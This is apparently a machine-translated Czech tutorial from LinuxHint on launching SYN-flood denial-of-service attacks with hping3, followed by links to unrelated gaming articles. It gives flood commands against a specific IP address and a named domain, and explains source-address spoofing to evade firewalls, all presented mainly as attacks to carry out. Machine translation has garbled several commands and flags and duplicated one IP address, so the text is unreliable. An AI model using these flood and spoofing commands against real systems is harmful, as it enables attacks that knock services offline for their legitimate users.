Bezpečnostní

hping3 povodeň ddos

hping3 povodeň ddos
Tento kurz se zaměřuje na útoky DDOS (Distributed Denial of Service) pomocí nástroje hping3. Pokud jste již obeznámeni s útoky DOS (Denial of Service) a DDOS, můžete pokračovat ve čtení z praktických pokynů hping3, jinak se doporučuje dozvědět se, jak tyto útoky fungují.

DOS útočí


Útok typu DOS (Denial of Service) je velmi jednoduchá technika, která popírá přístup ke službám (proto se mu říká útok „odmítnutí služby“). Tento útok spočívá v přetížení cíle nadměrně velkými pakety nebo jejich velkým množstvím.

I když je tento útok velmi snadno proveditelný, neohrožuje informace ani soukromí cíle, nejedná se o pronikavý útok a jeho cílem je pouze zabránit přístupu k cíli.
Odesláním množství paketů nemůže cíl zpracovat útočníky, aby zabránil serveru v poskytování legitimních uživatelů.

Útoky DOS jsou prováděny z jednoho zařízení, proto je snadné je zastavit blokováním IP útočníka, přesto může útočník změnit a dokonce spoofovat (klonovat) cílovou IP adresu, ale pro firewally není těžké se s takovými útoky vypořádat , na rozdíl od toho, co se stane s DDOS útoky.

DDOS útoky

Útok DDOS (Distributed Denial of Service) je podobný útoku DOS, ale provádí se z různých uzlů (nebo různých útočníků) současně. Běžně jsou útoky DDOS prováděny botnety. Botnety jsou automatizované skripty nebo programy, které infikují počítače za účelem provedení automatizovaného úkolu (v tomto případě útoku DDOS). Hacker může vytvořit botnet a infikovat mnoho počítačů, ze kterých budou botnety spouštět útoky DOS, skutečnost, že mnoho botnetů střílí současně, změní útok DOS na útok DDOS (proto se tomu říká „distribuováno“).

Samozřejmě existují výjimky, kdy útoky DDOS prováděly skutečné lidské útočníky, například hackerská skupina Anonymous integrovaná tisíci lidí na celém světě tuto techniku ​​velmi snadno používala kvůli její snadné implementaci (vyžadovala pouze dobrovolníky, kteří sdíleli svou věc), to je například způsob, jakým Anonymous nechal během invaze zcela odpojit Kaddáfího libyjskou vládu, libyjský stát zůstal bezbranný před tisíci útočníků z celého světa.

Pokud je tento typ útoků prováděn z mnoha různých uzlů, je extrémně obtížné mu zabránit a zastavit se a je obvykle nutné řešit speciální hardware, je to proto, že brány firewall a obranné aplikace nejsou připraveny vypořádat se s tisíci útočníků současně. To není případ hping3, většina útoků prováděných prostřednictvím tohoto nástroje bude blokována obrannými zařízeními nebo softwarem, přesto je to užitečné v místních sítích nebo proti špatně chráněným cílům.

O hping3

Nástroj hping3 umožňuje odesílat manipulované pakety. Tento nástroj umožňuje ovládat velikost, množství a fragmentaci paketů za účelem přetížení cíle a obejití nebo útoku na brány firewall. Hping3 může být užitečný pro účely testování zabezpečení nebo schopností, pomocí kterého můžete otestovat účinnost brány firewall a pokud server zvládne velké množství paketů. Níže naleznete pokyny, jak používat hping3 pro účely testování zabezpečení.

Začínáme s útoky DDOS pomocí hping3:

V distribucích Debian a Linuxu můžete nainstalovat hping3 spuštěním:

# apt nainstalovat hping3 -y

Jednoduchý útok na DOS (ne DDOS) by byl:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Kde:
sudo: dává potřebná oprávnění ke spuštění hping3.
hping3: volá program hping3.
-S: specifikuje pakety SYN.
-zaplavit: střílejte podle uvážení, odpovědi budou ignorovány (proto se odpovědi nebudou zobrazovat) a pakety budou odeslány co nejrychleji.
-PROTI: Výřečnost.
-p 80: port 80, můžete toto číslo nahradit službou, na kterou chcete zaútočit.
170.155.9.185: cílová IP.

Zaplavení pomocí paketů SYN proti portu 80:

Následující příklad zobrazuje útok SYN proti lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Kde:
Lacampora.org: je cíl
-q: krátký výstup
-n: zobrazit cílovou IP místo hostitele.
-d 120: nastavit velikost paketu
-zdroj rand: skrýt IP adresu.

Následující příklad ukazuje další možný příklad povodně:

SYN povodeň proti portu 80:

# sudo hping3 - zdroj zdroje Ivan.com -S -q -p 80 - povodeň

S hping3 můžete také zaútočit na své cíle falešnou IP adresou, abyste mohli obejít bránu firewall, můžete dokonce klonovat vlastní cílovou IP adresu nebo jakoukoli povolenou adresu, kterou znáte (můžete toho dosáhnout například pomocí Nmapu nebo snifferu, který chcete připojení).

Syntaxe by byla:

# sudo hping3 -a -S -q -p 80 - rychlejší -c2

V tomto praktickém příkladu by se útok zdál:

# sudo hping3 -a 190.0.175.100190.0.175.100 -S -q -p 80 - rychlejší -c2

Doufám, že vám tento návod na hping3 připadal užitečný. Pokračujte v LinuxHintu, kde najdete další tipy a aktualizace pro Linux a sítě.

Hry Vulkan pro uživatele Linuxu
Vulkan pro uživatele Linuxu
S každou novou generací grafických karet vidíme, že vývojáři her posouvají hranice grafické věrnosti a přibližují se k fotorealismu. Ale navzdory vešk...
Hry OpenTTD vs Simutrans
OpenTTD vs Simutrans
Vytvoření vlastní simulace dopravy může být zábavné, uvolňující a mimořádně lákavé. Proto se musíte ujistit, že vyzkoušíte co nejvíce her, abyste našl...
Hry Výukový program OpenTTD
Výukový program OpenTTD
OpenTTD je jednou z nejpopulárnějších her pro obchodní simulaci. V této hře musíte vytvořit skvělé dopravní podnikání. Začnete však na začátku kolem r...